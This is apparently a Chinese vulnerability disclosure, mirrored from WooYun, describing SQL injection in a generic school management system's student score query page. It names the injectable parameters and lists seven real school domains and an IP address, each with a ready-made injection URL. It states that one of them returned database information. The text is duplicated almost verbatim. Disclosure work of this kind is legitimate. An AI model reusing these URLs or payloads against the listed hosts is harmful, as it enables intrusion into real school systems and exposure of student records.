### 简要描述: 校园系统通用SQL注入 ### 详细说明: 漏洞细节: 见乌云,URL: [WooYun: 某通用型校园校务系统SQL注入](http://www.wooyun.org/bugs/wooyun-2014-082279) 属于遗漏一处: 漏洞位置在学生成绩查询处的输入处 位置:SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb 注入参数:StartKSID 借用前人案例: http://www.sdwhys.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.zjnksyzx.com:8801/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.lcxyz.com:21245/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.suyaxing.com:81/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.hwsyxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0...
### 简要描述: 校园系统通用SQL注入 ### 详细说明: 漏洞细节: 见乌云,URL: [WooYun: 某通用型校园校务系统SQL注入](http://www.wooyun.org/bugs/wooyun-2014-082279) 属于遗漏一处: 漏洞位置在学生成绩查询处的输入处 位置:SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb 注入参数:StartKSID 借用前人案例: http://www.sdwhys.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.zjnksyzx.com:8801/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.lcxyz.com:21245/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.suyaxing.com:81/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.hwsyxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.dlwsxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 以最后的一个为例:http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1 [<img src="https://images.seebug.org/upload/201502/111121092cf8478eecb6de8e8250812789b6a3bb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/111121092cf8478eecb6de8e8250812789b6a3bb.png) 继续: [<img src="https://images.seebug.org/upload/201502/111122107d0234d965ad77ec048dffe39abd1bba.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/111122107d0234d965ad77ec048dffe39abd1bba.png) 数据库信息: [<img src="https://images.seebug.org/upload/201502/11112222b386c59310359a9937ad5950d3464c9a.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/11112222b386c59310359a9937ad5950d3464c9a.png) ### 漏洞证明: 漏洞细节: 见乌云,URL: [WooYun: 某通用型校园校务系统SQL注入](http://www.wooyun.org/bugs/wooyun-2014-082279) 属于遗漏一处: 漏洞位置在学生成绩查询处的输入处 位置:SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb 注入参数:StartKSID 借用前人案例: http://www.sdwhys.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.zjnksyzx.com:8801/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.lcxyz.com:21245/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.suyaxing.com:81/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.hwsyxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.dlwsxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 以最后的一个为例:http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1 [<img src="https://images.seebug.org/upload/201502/111121092cf8478eecb6de8e8250812789b6a3bb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/111121092cf8478eecb6de8e8250812789b6a3bb.png) 继续: [<img src="https://images.seebug.org/upload/201502/111122107d0234d965ad77ec048dffe39abd1bba.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/111122107d0234d965ad77ec048dffe39abd1bba.png) 数据库信息: [<img src="https://images.seebug.org/upload/201502/11112222b386c59310359a9937ad5950d3464c9a.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/11112222b386c59310359a9937ad5950d3464c9a.png)
